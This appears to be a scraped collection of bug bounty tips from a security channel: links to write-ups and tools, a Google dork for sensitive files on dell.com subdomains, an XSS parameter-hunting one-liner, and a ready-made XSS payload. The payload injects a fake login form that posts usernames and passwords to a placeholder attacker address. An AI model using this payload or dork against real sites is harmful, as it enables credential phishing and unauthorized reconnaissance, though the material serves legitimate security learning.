Bug bounty Tips

The Hacker Mentality https://www.youtube.com/watch?v=X2uK5fd0VxA

GitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856) https://github.com/securelayer7/CVE-2024-38856_Scanner

try this google dork to find senstive files on website:

site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)

Finding Hidden Parameter & Potential XSS with Arjun + KXSS

arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss

❎ Penetration Testing Roadmap Public: https://github.com/securitycipher/penetration-testing-roadmap

Pentesting for Web Applications https://www.hackerone.com/penetration-testing/web-applications

Top Hacking Books for 2024 (plus Resources): FREE and Paid Tue, 17 Sep 2024 12:56:36 GMT https://medium.com/p/394601c01904

How I Utilized AI to Discover an Amazon S3 Bucket Takeover Vulnerability in Red Bull’s Bug Bounty…: https://medium.com/@mohamedsaqibc/how-i-utilized-ai-to-discover-an-amazon-s3-bucket-takeover-vulnerability-in-red-bulls-bug-bounty-503d3c4d995f?source=rss------bug_bounty-5

Hunting APIs for Bounties: How to Hack and Win Big in Bug Bounties!: https://medium.com/@rootspaghetti/hunting-apis-for-bounties-how-to-hack-and-win-big-in-bug-bounties-942d0f4e0885?source=rss------bug_bounty-5

xss preventing steps from front end and back end. Input Validation the web application will not allow us to submit the form if the email format is invalid. This was done with the following JavaScript code: Code: javascript function validateEmail(email) { const re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/; return re.test($("#login input[name=email]").val()); } As we can see, this code is testing the email input field and returning true or false whether it matches the Regex validation of an email format.

a payload to create a phishing page while you get a xss vulnerability, like stored xss or Dom xss '><script>document.write('<h3>Please login to continue</h3><form action=http://YOURIP:PORT/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--

☄️TplMap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool. 🔗https://github.com/epinna/tplmap

A bypass on GitLab’s Login Email Verification via OAuth ROPC flow. https://medium.com/@cybxis/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96

[2,500$ Bug Bounty Write-Up] Remote Code Execution (RCE) via unclaimed Node package https://medium.com/@p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643

🔖 Writeup-Miner: Stay Updated with Medium Feeds & Real-Time Alerts for Security Enthusiasts and Tech Researchers! Writeup-Miner is a 👩‍💻 Python script that fetches new articles from Medium RSS feeds and stores them in 👩‍💻 MongoDB or a simple .txt file. Plus, it sends you instant notifications through 📱 Telegram or 📱 Discord! Key Features: 🟢 Scrape Medium posts via RSS feeds 🟢 Store data in MongoDB or .txt format 🟢 Set custom filters to refine content 🟢 Get a real-time notifications via Telegram or Discord How to Use: 1. Install the tool: git clone https://github.com/0xSpidey/writeup-miner.git cd writeup-miner pip install -r requirements.txt 2. Configure Telegram or Discord notifications: python3 writeup-miner.py -t <Telegram Bot Token> -c <Telegram Chat ID> -m mongo 3. Sit back and get notified when new content is published! 👩‍💻 Example Command (Telegram): python3 writeup-miner.py -t 123456789:ABCdefGhIJKlmnoPQRstuVWxYZ -c -987654321 -m mongo 🖥 Explore More Options & Usage: Discover additional commands, filters, and options on our GitHub page👇 📱Github: 🔗Link #CyberSecurity #WriteupMiner #Automation #MediumRSS #bugbountyTools #bugbounty 🔹 Share & Support Us 🔹 📱 Channel : @bugbounty_tech